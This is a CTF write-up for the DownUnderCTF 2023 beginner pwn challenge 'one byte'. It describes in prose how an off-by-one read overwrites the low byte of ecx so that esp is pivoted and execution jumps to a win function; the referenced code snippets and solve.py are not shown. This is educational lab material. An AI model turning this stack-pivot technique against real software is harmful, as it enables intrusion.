[DownUnderCTF 2023 Writeup][pwn] one byte

This is one of the challenges for beginner pwn players.

First of all, we inspect the given binary file. It is a 32-bit ELF.

checksec:

PIE is enabled, so if we want to get the real address of a function used in the program, we need to calculate the base address of the file.

Look at the source code, the game turns easy when the program gives us the address of function init. The aim is to execute function win. We can utilize the given address to calculate the address of function win.

Paying more attention to lines 20 and 21, we see that buf is assigned with 0x10 bytes, but the program reads 0x11 bytes (we have one byte extra).

Let's take a look at asm code of the program:

Looking at the last snippet, we realize that if we can control the value of ecx register, then we can control esp value, and finally, we can change the return address of the program.

With only 1 byte extra, we can totally achieve that. Let's debug the program to take a deeper look.

First, we get the address of init: 0x565561bd

buf is 0x18 bytes far from ebp

After receiving the buffer, it will pop the value which is located in address ebp -8 (0xffffcd00) to ecx.

If we enter 0x11 bytes, we can control the last byte of ecx.

If we send a payload with the first 12 junk bytes, plus the address of function win and the last byte is a null byte, we can change the flow of the program to win (based on the last snippet of asm code of the main function)

This is the result of exploiting with local binary:

And finally, exploit the remote server and got the flag:

solve.py

For more challenges in the contest, please visit this GitHub repo: https://github.com/DownUnderCTF/Challenges_2023_Public/